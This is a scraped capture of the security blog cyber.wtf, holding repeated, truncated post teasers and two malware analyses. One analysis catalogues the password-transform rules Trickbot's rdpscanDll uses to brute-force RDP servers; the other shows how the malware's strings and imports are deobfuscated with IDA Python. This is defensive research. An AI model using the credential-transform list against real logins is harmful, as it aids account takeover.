More Annotations

Favourite Annotations

Text

CYBER.WTF

Authors: Luca Ebach, Tilman Frosch. Rejoice everyone, today we pushed bindifflib to our Github!Bindifflib is a framework to build a set of libraries with a set of different compilers, currently the compilers of Visual Studio 2010, 2013, 2015, and 2017 – both 32 bit and 64

bit.

WTF? – CYBER.WTF

In both cases, the liberal use of ‘cyber’ adds nothing to the discussion¹. When we navigate around the sales lingo and look at the technology beyond, we find ourselves in the land of computers, networks, registers, packets and the like. And, let’s be honest, often enough when we look at technology in enough detail, ‘wtf?’

is a not an

TRICKBOT RDPSCANDLL

Trickbot rdpscanDll – Transforming Candidate Credentials for Brute-Forcing RDP Servers. After some weeks of not seeing the RDP scanner module of Trickbot, I recently observed that the module was again distributed among the bots in our tracking lab. Since Bitdefender already published a report on the module in March 2020, I

focused on checking

IMPRINT – CYBER.WTF Imprint. G DATA | Advanced Analytics GmbH. G DATA Campus. Königsallee 178. D-44799 Bochum. Management Board. Dr. Tilman Frosch, Michael

Zimmer. HRB

TWO COVERT CHANNELS

The simplest use for a side channel is the so called covert channel. Most microarchitecture side channels can be used to communicate between two trust domains when an attacker has access to both. An attacker can use covert channels for data exfiltration. The most important two reasons are to stay hidden or because regular channels

are not open.

USING IDA PYTHON TO ANALYZE TRICKBOT So the actual magic happens in sub_40E970(): We see a single call to sub_404080(). But most important is the first function argument, which adds a1 to the base address of the label which IDA called “Src”. CACHE SIDE CHANNEL ATTACKS: CPU DESIGN AS A SECURITY Further that the cache design is not a requirement to be an x86, that is the cache could be designed differently and be less useful for cache side channel attacks without causing software incompatibility. The bandwidth of the side channel is essentially the bandwidth of the cache and thus a lot of valuable data can be leaked. DGA CLASSIFICATION AND DETECTION FOR AUTOMATED MALWARE Introduction Botnets are one of the biggest current threats for devices connected to the internet. Their methods to evade security actions are frequently improved. Most of the modern botnets use Domain Generation Algorithms (DGA) to generate and register many different domains for their Command-and-Control (C&C) server with the purpose to defend it from takeovers and EMOTET HARVESTS MICROSOFT OUTLOOK Emotet harvests Microsoft Outlook. The original German blog post can be found on the G DATA Blog. Emotet has been known as a trojan for years. Former versions focused on attacking online banking users, however the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were

published by

CYBER.WTF

bit.

WTF? – CYBER.WTF

is a not an

TRICKBOT RDPSCANDLL

focused on checking

IMPRINT – CYBER.WTF Imprint. G DATA | Advanced Analytics GmbH. G DATA Campus. Königsallee 178. D-44799 Bochum. Management Board. Dr. Tilman Frosch, Michael

Zimmer. HRB

TWO COVERT CHANNELS

are not open.

published by

WTF? – CYBER.WTF

is a not an

META – CYBER.WTF

bit.

TWO COVERT CHANNELS

are not open.

BEHIND THE SCENES OF A BUG COLLISION Introduction In this blog post I'll speculate as to how we ended up with multiple researchers arriving at the same vulnerabilities in modern CPU's concurrently. The conclusion is that the bug was ripe because of a years long build up of knowledge about CPU security, carried out by many research groups. I'll also detail the DISSECTING OLYMPIC DESTROYER Introduction After a destructive cyber attack had hit this year's olympics, the malware was quickly dubbed Olympic Destroyer. Talos were fast to provide initial coverage. A malware explicitly designed to sabotage the computer systems of the Olympic opening ceremony sounded very interesting, but other duties were more pressing at that time, so

analysis for pure

COVERT SHOTGUN

Covert shotgun currently only uses a handful of instructions at once and thus is unlikely to be able to find side channels in this cache. The cache however is particularly interesting as it would give information on instructions in the cache. Once parsed the myOps are MASSCAN & THE PROBLEMS OF STATIC DETECTION OF Introduction Microarchitectural attacks have been known for more than a decade now. The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause for vulnerabilities any time soon. With this in

mind, the search

THE KINGS IN YOUR CASTLE PART #1 The Kings In Your Castle Part #1. All the lame threats that own you, but will never make you famous. In March 2016 I presented together with Raphael Vinot at this year’s Troopers conference in Heidelberg. The talk treated research of targeted malware, the how’s and if’s of malicious binaries, the involvement of sophistication and exploits MICRO ARCHITECTURE ATTACKS ON KASLR Introduction Recently a number of different micro architecture attacks on Kernel Address Space Layout Randomization(KASLR) have been published. The idea behind KASLRis that code reuse attacks and read/write primitives are useless if the attacker is unable to tell where what code/data is. Consequently modern operating system randomizes the virtual addresses where code/data is stored. ZEUS PANDA: DOWN TO THE ROOTS Zeus Panda: Down To The Roots. Some time ago, we analyzed Panda’s webinjects to get an insight in how they actually work and to understand their communication with the ATS servers (read it here: part 1, part 2 ). In the last few weeks, we drilled down on the binary itself and had a closer look on this side of the Zeus.Panda malware.

CYBER.WTF

bit.

WTF? – CYBER.WTF

Isn't that what you think when you see that yet another person prefixed yet another -once meaningful- noun with 'cyber'? Call us old-fashioned, but underneath cyber*, there is either something very ordinary and someone trying hard for a better headline, or something very much nuanced and someone glazing over these depths and nuances

with a

TRICKBOT RDPSCANDLL

After some weeks of not seeing the RDP scanner module of Trickbot, I recently observed that the module was again distributed among the bots in our tracking lab. Since Bitdefender already published a report on the module in March 2020, I focused on checking whether or not the command-and-control (C2) communication of the module remained IMPRINT – CYBER.WTF G DATA | Advanced Analytics GmbH G DATA Campus Königsallee 178 D-44799 Bochum Management Board Dr. Tilman Frosch, Michael Zimmer HRB Bochum 15802 VAT-Number DE 303 701 188 E

TWO COVERT CHANNELS

Introduction Too much WinWord. Too much Tex. Too many meetings. Too little CPU. It was time for a short pause from the grind and dig into some tetravalent metalloid. My current project was too big a mouthful to get into before going to Black Hat, so I dug up a pet project to

play around

decided to do that

EMOTET HARVESTS MICROSOFT OUTLOOK The original German blog post can be found on the G DATA Blog. Emotet has been known as a trojan for years. Former versions focused on attacking online banking users, however the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were published by CERT Polska in April

2017.

DGA CLASSIFICATION AND DETECTION FOR AUTOMATED MALWARE Introduction Botnets are one of the biggest current threats for devices connected to the internet. Their methods to evade security actions are frequently improved. Most of the modern botnets use Domain Generation Algorithms (DGA) to generate and register many different domains for their Command-and-Control (C&C) server with the purpose to defend it from takeovers and THE KINGS IN YOUR CASTLE PART #1 All the lame threats that own you, but will never make you famous. In March 2016 I presented together with Raphael Vinot at this year’s Troopers conference in Heidelberg. The talk treated research of targeted malware, the how’s and if’s of malicious binaries, the involvement of sophistication and exploits, the presence or absence of

patters

CYBER.WTF

bit.

WTF? – CYBER.WTF

with a

TRICKBOT RDPSCANDLL

TWO COVERT CHANNELS

play around

decided to do that

2017.

patters

WTF? – CYBER.WTF

with a

META – CYBER.WTF

bit.

TWO COVERT CHANNELS

play around

COVERT SHOTGUN

Automatically finding SMT covert channels Introduction In my last blog post I found two covert channels in my Broadwell CPU. This blog post will again be about covert channels. For those unfamiliar a covert channel is a side channel where the attacker has an implant in the victim context and uses his channel to “smuggle DISSECTING OLYMPIC DESTROYER Introduction After a destructive cyber attack had hit this year's olympics, the malware was quickly dubbed Olympic Destroyer. Talos were fast to provide initial coverage. A malware explicitly designed to sabotage the computer systems of the Olympic opening ceremony sounded very interesting, but other duties were more pressing at that time, so

analysis for pure

MASSCAN & THE PROBLEMS OF STATIC DETECTION OF Introduction Microarchitectural attacks have been known for more than a decade now. The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause for vulnerabilities any time soon. With this in

mind, the search

ZEUS PANDA: DOWN TO THE ROOTS Some time ago, we analyzed Panda’s webinjects to get an insight in how they actually work and to understand their communication with the ATS servers (read it here: part 1, part 2). In the last few weeks, we drilled down on the binary itself and had a closer look on this side

of the Zeus.Panda

THE KINGS IN YOUR CASTLE PART #1 All the lame threats that own you, but will never make you famous. In March 2016 I presented together with Raphael Vinot at this year’s Troopers conference in Heidelberg. The talk treated research of targeted malware, the how’s and if’s of malicious binaries, the involvement of sophistication and exploits, the presence or absence of

patters

MICRO ARCHITECTURE ATTACKS ON KASLR Introduction Recently a number of different micro architecture attacks on Kernel Address Space Layout Randomization(KASLR) have been published. The idea behind KASLRis that code reuse attacks and read/write primitives are useless if the attacker is unable to tell where what code/data is. Consequently modern operating system randomizes the virtual addresses where code/data is stored.

CYBER.WTF

bit.

WTF? – CYBER.WTF

with a

IMPRINT – CYBER.WTF G DATA | Advanced Analytics GmbH G DATA Campus Königsallee 178 D-44799 Bochum Management Board Dr. Tilman Frosch, Michael Zimmer HRB Bochum 15802 VAT-Number DE 303 701 188 E

TRICKBOT RDPSCANDLL

TWO COVERT CHANNELS

play around

carried out by

COVERT SHOTGUN

Automatically finding SMT covert channels Introduction In my last blog post I found two covert channels in my Broadwell CPU. This blog post will again be about covert channels. For those unfamiliar a covert channel is a side channel where the attacker has an implant in EMOTET HARVESTS MICROSOFT OUTLOOK The original German blog post can be found on the G DATA Blog. Emotet has been known as a trojan for years. Former versions focused on attacking online banking users, however the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were published by CERT Polska in April

2017.

NEGATIVE RESULT: READING KERNEL MEMORY FROM USER MODEKERNEL MEMORY DUMPKERNEL MEMORY LAYOUTLINUX KERNEL MEMORYLINUX KERNEL MEMORY

MANAGEMENT

I were going to write an introduction about how important negative results can be. I didn’t. I assume you can figure out for yourself why that is and if not you got all the more reason to read this blog post. If you think it’s trivial why my result is negative, you

definitely need to

CYBER.WTF

bit.

WTF? – CYBER.WTF

with a

IMPRINT – CYBER.WTF G DATA | Advanced Analytics GmbH G DATA Campus Königsallee 178 D-44799 Bochum Management Board Dr. Tilman Frosch, Michael Zimmer HRB Bochum 15802 VAT-Number DE 303 701 188 E

TRICKBOT RDPSCANDLL

TWO COVERT CHANNELS

play around

carried out by

COVERT SHOTGUN

Automatically finding SMT covert channels Introduction In my last blog post I found two covert channels in my Broadwell CPU. This blog post will again be about covert channels. For those unfamiliar a covert channel is a side channel where the attacker has an implant in EMOTET HARVESTS MICROSOFT OUTLOOK The original German blog post can be found on the G DATA Blog. Emotet has been known as a trojan for years. Former versions focused on attacking online banking users, however the current Emotet was transformed into a downloader and information stealer. The first reports of this new variant were published by CERT Polska in April

2017.

NEGATIVE RESULT: READING KERNEL MEMORY FROM USER MODEKERNEL MEMORY DUMPKERNEL MEMORY LAYOUTLINUX KERNEL MEMORYLINUX KERNEL MEMORY

MANAGEMENT

definitely need to

ANALYSIS – CYBER.WTF Introduction. After a destructive cyber attack had hit this year’s olympics, the malware was quickly dubbed Olympic Destroyer. Talos were fast to provide initial coverage.A malware explicitly designed to sabotage the computer systems of the Olympic opening ceremony sounded very interesting, but other duties were more pressing at that time, so analysis for pure curiosity had to wait.

META – CYBER.WTF

bit.

PANDA – CYBER.WTF

Some time ago, we analyzed Panda’s webinjects to get an insight in how they actually work and to understand their communication with the ATS servers (read it here: part 1, part 2). In the last few weeks, we drilled down on the binary itself and had a closer look on this side of the Zeus.Panda malware. MASSCAN & THE PROBLEMS OF STATIC DETECTION OF Introduction Microarchitectural attacks have been known for more than a decade now. The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause for vulnerabilities any time soon. With this in

mind, the search

TILMAN FROSCH

However, I came to enjoy civilization and as most people, I rely on the critical infrastructures that make our societies tick. I’ve been leading incident response assignments in hospitals more than once in the last year and as a human, who may suddenly require the services of a hospital at some point or another, I am very grateful for the effort and dedication my colleagues and the clients

MARION MARSCHALEK

All the lame threats that own you, but will never make you famous. In March 2016 I presented together with Raphael Vinot at this year’s Troopers conference in Heidelberg. The talk treated research of targeted malware, the how’s and if’s of malicious binaries, the involvement of sophistication and exploits, the presence or absence of patters within advanced persistent threats (APTs). ZEUS PANDA WEBINJECTS: DON’T TRUST YOUR EYES 1: The SL branch is triggered at the beginning of the attack, when an infected victim accesses the login page of the targeted online banking, inserts the login credentials and clicks on the submit button. (NOTE: The low level Trojan functions need to trigger an the initial webinject (generic loader) on that website and therefore the URL of the online banking website has to be listed in the

DECEMBER 2016

2 posts published by Marion Marschalek during December 2016. Welcome back, to the fifth and last part of our blog series The Kings In Your Castle, where we aim to shed light on how A.P.T. functions, how targeted malware looks like and the issues us analysts might find on

it.

JULY 2016 – CYBER.WTF 1 post published by Marion Marschalek during July 2016. Last year I held a free reverse engineering workshop for women, mainly in the not entirely un-selfish interest to see more of them around in the whole

security field.

Skip to content

CYBER.WTF

* WTF?

* Imprint

TRICKBOT RDPSCANDLL – TRANSFORMING CANDIDATE CREDENTIALS FOR BRUTE-FORCING RDP SERVERS After some weeks of not seeing the RDP scanner module of Trickbot, I recently observed that the module was again distributed among the bots in our tracking lab. Since Bitdefender already published a report on the module in March 2020

,

I focused on checking whether or not the command-and-control (C2) communication of the module remained more or less the same or if there was anything groundbreakingly new. Short answer: there wasn’t. There may be some under-the-hood fixes or improvements but I (as of yet) did not stumble upon anything significant that wasn’t already found by Bitdefender: the module still receives its mode of action, target servers, usernames, and password candidates from the C2 server and then does what the mode tells it to do. But while I was checking that, I also had a look at the actual data that we received from the C2

server.

PASSWORD LIST

My intuition on the password list was that it is just a dictionary of words to try. This is also suggested by the URL which is used to retrieve the password list: hxxps://%c2%/%gtag%/%bot_id%/rdp/DICT. Thus I did not have a closer look at the password list at that time, because everything looked the way Bitdefender described it and I had no reason to look at it in detail. But one or two days later, I re-requested the list of passwords to see whether the list changed in the meantime – and it did indeed. Because of that I had a quick look at what changed and then I noticed that I overlooked something right from the start (literally, duh!). On the left side of the picture you see what I had a quick look at after retrieving the password list from the C2 server with curl (and thus seeing only the last lines of the output). On the right side there is the very same password list, just seen from the start. To the keen eye it seems that they may be using some kind of templating mechanism to adjust the list of passwords and use more specific credential candidates. With that thought in mind I spun up my analysis environment and started digging into the module to see what the Trickbot gang is actually doing there (spoiler: yes, they do some kind of templating – but not just the find-and-replace kind). TRANSFORMING THEM P@SSW0RDS As mentioned before, this is not a simple find-and-replace but instead they can change the credential candidates to better fit the attacked host. In that sense, I decided to call those things transforms instead of templates because they are not just templates that are filled out but a little bit more dynamic. Example: * %username%123 → myuser123 (lowercase) * %Username%123 → Myuser123 (lowercase but first char uppercase) * %UsErNaMe%123 → MyUsEr123 (alternating case, starting with

uppercase char)

* %EMANRESU%123 → RESUYM123 (uppercase and reversed) And that is essentially how the markers in the password list work. I was able to extract all 91 transformations that are currently available to the rdpscanDll (as of 2020-08-14). Please find the list with all transforms with an example and a description for each of them at the end of this blog post. Some of the transforms can even be parameterized to a certain degree: %OriginalUsername%, %OriginalDomain%, and %domain% can be prepended or appended with an (N) to indicate whether the first N or last N characters of the element should be used (or everything if no parameters are present).

RECONNAISSANCE

After finding the list of transforms, I decided to ask my favorite internet search engine whether these names for the transforms are known related to RDP. And I indeed found a RDP brute force tool by a certain z668 which seemingly makes use of some of the transforms that are used in the rdpscanDll. Although this tool seems to be a standalone application, the names of the transforms and the context of their use could suggest a connection between z668 and the Trickbot gang – at least to a certain degree. Sure, the connection may not be really strong because the Trickbot module is written in C++ and the RDP tool seems to be written in C#. But given the fact that C# can load and use native DLLs and considering that z668 forked the FreeRDP project on Github, the actual scanner may indeed be written in C/C++ (and probably using FreeRDP). Thus it is possible that the Trickbot gang may have obtained the source code from z668 to integrate the RDP scanner into their module framework and to use their C2 communication protocol. But: this is just guessing based on some more or less loose facts – I could easily be completely wrong with that.

TRANSFORM LIST

TRANSFORM IDENTIFIER

EXAMPLE

DESCRIPTION

EmptyPass

tries an empty password

GetHost

fills in the hostname of the currently attacked IP (ex: myhost)

IP

the currently attacked IP address (ex: 234.234.234.234)

Port

fills in the currently attacked port (ex: 3389)

IpReplaceDot

234.234.234.234 → 234234234234 remove the dots of the IP address

RemoveNumerics

us3rn4me → usrnme

removes all number from the username

RemoveLetters

us3rn4m3 → 343

removes all letters from the username

RemoveOtherSymbols

usern@m3 → usernm3 removes all non-alphanumeric characters from the username OriginalUsernameLettersBeginInverse 123admin456 → 123654nimda keeps all non-letters (i.e. digits, special chars) at the beginning of the username and reverses the rest (“invert letters

begin

OriginalUsernameLettersBeginSwap 123admin456 → admin456123 swaps all non-letters (i.e. digits, special chars) at the beginning of the username with the rest (“swap letters begin”) OriginalUsernameLettersEndInverse admin123root → admintoor321 keeps all letters at the beginning of the username and reverses the rest (“invert letters end”) OriginalUsernameLettersEndSwap admin123root → 123rootadmin swaps all letters at the beginning of the username with the rest (“swap letters end”) OriginalUsernameNumsBeginInverse admin123root → admintoor321 keeps all non-digits at the beginning of the username and reverses the rest (“invert nums begin OriginalUsernameNumsBeginSwap admin123root → admintoor321 swaps all non-digits at the beginning of the username with the rest (“swap nums begin”) OriginalUsernameNumsEndInverse 123admin → 123nimda keeps all digits at the beginning of the username and reverses the rest (“invert nums end”) OriginalUsernameNumsEndSwap 123admin456 → admin456123 swaps all digits at the beginning of the username with the rest (“swap nums end”) OriginalUsernameInsert %OriginalUsernameInsert%(N)SOMESTRING → SOMEusernameSTRING (ex: N

= 4)

insert username after Nth character of SOMESTRING

OriginalUsername

use the username as password

OnlyName

Firstname Lastname → Firstname uses only the first name (everything left of the first space) of the username as password

OnlySurname

Firstname Lastname → Lastname uses only the last name (everything right of the first space) of the username as password

username

Admin → admin

username in lowercase

Username

AdMin → Admin

username lowercase but first char upper

UsErNaMe

Admin → AdMiN

username in alternating case, starting with uppercase

uSeRnAmE

Admin → aDmIn

username in alternating case, starting with lowercase

USERNAME

Admin → ADMIN

username in uppercase

EMANRESU

Admin → NIMDA

username in uppercase and reversed

EmanresuLowercase

AdMin → Nimda

username reversed and lowercase, first char uppercase

Emanresu

AdMin → NiMdA

username reversed, first char upper

emanresuLowercase

AdMin → nimda

username reversed and lowercase

emanresuUppercase

AdMin → NIMDA

username reversed and uppercase

emanresu

Admin → nimda

username reversed and lowercase

ReplaceFirst_X-x

administrator → @dministrator (ex: %ReplaceFirst_a-@%) replaces the first occurrence of X with x in the username (needle and replacement can be more than 1 char)

ReplaceFirstI_X-x

Administrator → @dministrator (ex: %ReplaceFirstI_a-@%) case insensitively replaces the first occurrence of X with x in the username (needle and replacement can be more than 1 char)

ReplaceLast_X-x

administrator → @dministrator (ex: %ReplaceLast_a-@%) replaces the last occurrence of X with x in the username (needle and replacement can be more than 1 char)

ReplaceLastI_X-x

Administrator → @dministrator (ex: %ReplaceLastI_a-@%) case insensitively replaces the last occurrence of X with x in the username (needle and replacement can be more than 1 char)

ReplaceAll_X-x

administrator → @dministrator (ex: %ReplaceAll_a-@%) replaces all occurrences of X with x in the username (needle and replacement can be more than 1 char)

ReplaceAllI_X-x

Administrator → @dministrator (ex: %ReplaceAllI_a-@%) case insensitively replaces all occurrences of X with x in the username (needle and replacement can be more than 1 char) DomainRemoveNumerics test-123.com → test-.com removes all digits from the domain

DomainRemoveLetters

test-123.com → -123. removes all letters from the domain DomainRemoveOtherSymbols test-123.com → test123com removes all non-alphanum chars from the domain OriginaldomainInsert %OriginaldomainInsert%(N)SOMESTRING → SOMEdomainSTRING (ex: N =

4)

insert domain after Nth character of SOMESTRING

OriginaldomainPart

test-123.com → 123com (ex: %OriginaldomainPart%(6)) takes the last N chars of the domain name (ignoring any dots) OriginaldomainNumsBeginInverse test-123.com → test-moc.321 keeps all non-digits at the beginning of the domain and reverses the rest (“invert nums begin OriginaldomainNumsBeginSwap test-123.com → 123.comtest- swaps all non-digits at the beginning of the domain with the rest (“swap nums begin”) OriginaldomainNumsEndInverse 123-test.com → 123moc.tset- keeps all digits at the beginning of the domain and reverses the rest (“invert nums end”) OriginaldomainNumsEndSwap 123-test.com → -test.com123 swaps all digits at the beginning of the domain with the rest (“swap nums end”) OriginaldomainLettersBeginInverse test-123.com → test-moc.321 keeps all non-letters (i.e. digits, special chars) at the beginning of the domain and reverses the rest (“invert letters

begin

OriginaldomainLettersBeginSwap 123-test.com → test.com123- swaps all non-letters (i.e. digits, special chars) at the beginning of the domain with the rest (“swap letters begin”) OriginaldomainLettersEndInverse test-123.com → testmoc.321- keeps all letters at the beginning of the domain and reverses the rest (“invert letters end”) OriginaldomainLettersEndSwap test-123.com → -123.comtest swaps all letters at the beginning of the domain with the rest (“swap letters end”)

Originaldomainleft

test-123.com → test-123 takes the left part of the domain (everything left of the first dot) and lowercases the first character

OriginalDomainleft

test-123.com → Test-123 takes the left part of the domain (everything left of the first dot) and capitalizes the first character

Originaldomainright

test-123.com → test-123 takes the right part of the domain (everything right of the first dot) and lowercases the first character

OriginalDomainright

test-123.com → Test-123 takes the right part of the domain (everything right of the first dot) and capitalizes the first character

Originaldomain

uses the plain domain name

OriginalDomain

test-123.com → Test-123.com uses the domain name and capitalizes the first character

NiamodLowercase

abc%NiamodLowercase%123

abc123

niamodLowercase

test-123.com → Moc.321-tset reverses and lowercases the domain name, first character

capitalized

niamodUppercase

test-123.com → mOC.312-TSET reverses and capitalizes the domain name, first char lowercase

domainleftHyphen

test-123.com → test takes everything left of the first hyphen

DOMAINLEFTHYPHEN

test-123.com → TEST takes everything left of the first hyphen, capitalized

DomainleftHyphen

test-123.com → Test takes everything left of the first hyphen, first char capitalized

domainrightHyphen

test-123.com → 123.com takes everything right of the first hyphen

DOMAINRIGHTHYPHEN

test-123.com → 123.COM takes everything right of the first hyphen, capitalized

DomainrightHyphen

test-abc.com → Abc.com takes everything right of the first hyphen, first char capitalized domainleftUnderscore test_123.com → test takes everything left of the first underscore DOMAINLEFTUNDERSCORE test_123.com → TEST takes everything left of the first underscore, capitalized DomainleftUnderscore test_123.com → Test takes everything left of the first underscore, first char

capitalized

domainrightUnderscore test_abc.com → abc.com takes everything right of the first underscore DOMAINRIGHTUNDERSCORE test_123.com → 123.COM takes everything right of the first underscore, capitalized DomainrightUnderscore test_abc.com → Abc.com takes everything right of the first underscore, first char

capitalized

DomainReplaceFirst_X-x EXAMPLE-attack.com → EXAMPLE-@ttack.com (ex: %DomainReplaceFirst_a-@%) replaces the first occurrence of X with x in the domain (needle and replacement can be more than 1 char) DomainReplaceFirstI_X-x EXAMPLE-attack.com → EX@MPLE-attack.com (ex: %DomainReplaceFirstI_a-@%) case insensitively replaces the first occurrence of X with x in the domain (needle and replacement can be more than 1 char) DomainReplaceLast_X-x EXAMPLE-attack.com → EXAMPLE-att@ck.com (ex: %DomainReplaceLast_a-@%) replaces the last occurrence of X with x in the domain (needle and replacement can be more than 1 char) DomainReplaceLastI_X-x EXAMPLE-attack.com → EXAMPLE-att@ck.com (ex: %DomainReplaceLastI_a-@%) case insensitively replaces the last occurrence of X with x in the domain (needle and replacement can be more than 1 char) DomainReplaceAll_X-x EXAMPLE-attack.com → EXAMPLE-@tt@ck.com (ex: %DomainReplaceAll_a-@%) replaces all occurrences of X with x in the domain (needle and replacement can be more than 1 char) DomainReplaceAllI_X-x EXAMPLE-attack.com → EX@MPLE-@tt@ck.com (ex: %DomainReplaceAllI_a-@%) case insensitively replaces all occurrences of X with x in the domain (needle and replacement can be more than 1 char)

niamod

test-123.com → moc.321-tset reverses the domain name

Niamod

test-123.com → Moc.321-tset reverses the domain name, first char capitalized

domainleft

TEST-123.com → test-123 everything left of the first dot, lowercased

DOMAINLEFT

Test-123.com → TEST-123 everything left of the first dor, capitalized

Domainleft

test-123.com → Test-123 everything left of the first dot, lowercased but first char

capitalized

domainright

TEST-123.com → com everything right of the first dot, lowercased

DOMAINRIGHT

Test-123.com → COM everything right of the first dor, capitalized

Domainright

test-123.com → Com everything right of the first dot, lowercased but first char

capitalized

domain

TEST-123.com → test-123.com domain name, lowercase

Domain

TEST-123.com

domain name lowercased, first char capitalized

DoMaIn

test-123.com → TeSt-123.cOm domain name in alternating case, starting with uppercase

dOmAiN

test-123.com → tEsT-123.CoM domain name in alternating case, starting with lowercase

DOMAIN

test-123.com → TEST-123.COM domain name capitalized

NIAMOD

test-123.com → MOC.321-TSET domain name reversed and capitalized Author Luca Ebach Posted on August 31, 2020August 31, 2020

Categories

analysis Tags analysis

, brute

, bruteforce

, dll ,

force , malware

, rdp ,

rdpscan , rdpscandll

, scan

, trickbot

, trickster

USING IDA PYTHON TO ANALYZE TRICKBOT

INTRODUCTION

When analyzing malware, one often has to deal with lots of tricks and obfuscation techniques. In this post we will look at several obfuscation and anti-analysis techniques used by the malware Trickbot,

based on the sample

8F590AC32A7C7C0DDFBFA7A70E33EC0EE6EB8D88846DEFBDA6144FADCC23663A from mid of December 2018. After analyzing and understanding the obfuscation techniques, we will take care of deobfuscating the malware with IDA Python in order to make the code easier to analyze in Hexrays’ decompiler.

RELATED WORK

With a malware as wide spread and publicly known as Trickbot, there is already a lot of research. Some intersections with this article can be found in the work of Michał Praszmo at https://www.cert.pl/en/news/single/detricking-trickbot-loader/, where some of the obfuscation features are touched. A similar, but more in-depth analysis from Hasherezade can be found at https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/ in conjunction with the tutorial on https://www.youtube.com/watch?v=KMcSAlS9zGE. Also Vitali Kremez explained the string obfuscation of a Trickbot sample at https://www.vkremez.com/2018/07/lets-learn-trickbot-new-tor-plugin.html OBFUSCATED IMPORT ADDRESS TABLE If you put the unpacked binary in IDA, you can see that Trickbot has several imported functions: Yet, the first line of the decompiled wWinMain() shows lots of function calls relative to the address stored at dword_42A648. Looking at the x-refs of this address, we can find out in which context it is written to: Decompiling the function sub_402D30 () shows that dword_42A648 points to a buffer of 0x208 bytes (or 129 DWORDs). The buffer is modified in the same function with a call to sub_40C8C0(). Note that stru_42A058 holds a pointer to a structure which we will get to know in the following function, as it is an argument for the function call to sub_40C8C0(). This call is done 8 times in a loop as you can see in line 21 to 27. Within sub_40C8C0() Hexrays’ decompiler shows the following picture: We can see the following things: The argument called “hModule” by IDA is a pointer to a structure. Its first DWORD contains a hint to a string used in LoadLibraryW() in

line 12 and 13.

The second DWORD of the structure is used in line 14, 16, 18 and 21 and contains a list of hints to function names used in

GetProcAddress().

The third DWORD of the structure is used to mark the end of the list of the second DWORD in the for-loop in line 16. The fourth DWORD of the structure is used in line 15, 16 and 20 and points to a list of offsets, which is used to calculate the address to store the imported functions, with the base of our previously allocated 0x208 bytes array. Putting it all together, our structure is defined as follows: > struct IATstruct

> {

> DWORD offsetForDecryptionDLLname; > DWORD offsetForDecryptionImportNamesArrayStart; > DWORD offsetForDecryptionImportNamesArrayEnd; > DWORD IAToffset;

> };

Now our function looks much nicer: It is now obvious that our mysterious buffer of 0x208 bytes is actually an IAT which is stored on the heap. The pointer to the IAT is located at dword_42A648 and the 383 x-refs to this address which we saw in the beginning are mostly calls to this IAT.

DECRYPT ALL STRINGS

Now the question remains, what the functions sub_407110() and sub_405210() are doing to yield library- and function names. When disassembling them, you can see that both call sub_40E970(). Only the first one, sub_407110(), has an additional call after that, but that is only used to transform a string to a wide string: So the actual magic happens in sub_40E970(): We see a single call to sub_404080(). But most important is the first function argument, which adds a1 to the base address of the label which IDA called “Src”. Looking at Src, we can see it is a table with offsets to some scrambled strings: So the argument a1 is simply an offset to the table pointed to by Src and decides which of the strings is provided to sub_404080(). When looking at sub_404080(), we can see a function which has over 100 lines of disassembled code. I just chose the most relevant part to display in a screenshot: Without going too much into details, you can see that from line 44 to 63 a substitution takes place based on the first function argument (copied to “Dst”) and the string pointer named off_42A050 by IDA in line 44. The string looks like this: From line 64 to 69 the previously substituted bytes are then mangled by some bit operations, where four input bytes are mapped to three output bytes. According to the blog of Vitali Kremez mentioned above, this was once a base64 algorithm with a custom alphabet. It still is similar to that, but is seems to be extended by the bit manipulation

operations.

Putting it all together, we now know that each string of the IAT is scrambled by a substitution cipher and a bit manipulation algorithm. The function arguments provided in the functions sub_407110() and sub_405210() from the IAT algorithm described previously are offsets to string pointers to the scrambled strings stored at 0x00427C1C, called “Src” by IDA. We also know that sub_407110() returns a wide string, while sub_405210() returns an ANSI string. When cross referencing those two functions, we can see 159 and 52

calls to them:

Looking at the calls, we can see that the argument, which describes the string offset, is pushed on the stack as second function argument, in our case 73h. The pointer to the output string is the first

argument:

Looking a bit further, we can find a third function sub_4019F0(), which calls sub_40E970() for decrypting strings. Again, the argument is provided via a push of a constant number. So we can write a simple IDA python script to decrypt all strings and print them. The algorithm is quite simple: > * Manually identify all three functions which call sub_40E970()

>

> * For each xref to one of those three functions:

>

> * Disassemble backwards until we find the first push which is a

> number

> * Add the base address of the crypted string table to find the > referenced string > * Decrypt the string based on the reversed algorithm

*

The output looks like this (note that line breaks are not encoded, but do actually break the lines): We can also adapt our algorithm to print us the import address table, since we know the structure used in sub_40C8C0() to build the IAT: > * Take the pointer at stru_42A058 > * Convert the values stored there into an array of the structure > “IATstruct” (described previously) with eight array elements

>

> * For each of those eight elements:

>

> * Decrypt the first DWORD as DLL name > * Iterate from second to third DWORD and decrypt them to get all > imported function > * Take the fourth DWORD as an offset where the function is placed > on our IAT on the heap Printing the IAT as a dictionary looks like this: SETTING COMMENTS TO DECOMPILATION One thing that always bugged me is that it is trivial to add comments in the disassembly in IDA. But since I use the decompiler a lot, I wanted to add my decrypted strings as comments in the decompiler view. After rather unsatisfying google searches, I spent hours in IDA’s API documentation, read a bunch of existing IDA plugins to look for hints and tried out a lot. Turns out my IDA 6.9 is very crashy when working with IDA Python and also the documentation is not always as helpful as one would like it to be. But I finally succeeded with a lot of try and error and a little bit

of brute forcing:

First you need to translate the address of the disassembly to the function line of the decompiled code. Then by using a ctree object, you can place a comment there. Unfortunately, the ctree object needs to have the correct “item preciser” (ITP). An ITP specifies if a comment is e.g. placed in a line of an “else”, “do”, “opening curly brace”, and so on. If you set the incorrect ITP to your ctree object, your comment is “orphaned” and won’t be placed correctly. I still do not understand how I know which ITP I should use, so I developed a little brute force algorithm: > * Delete all orphaned comments from current function

>

> * For each possible ITP:

>

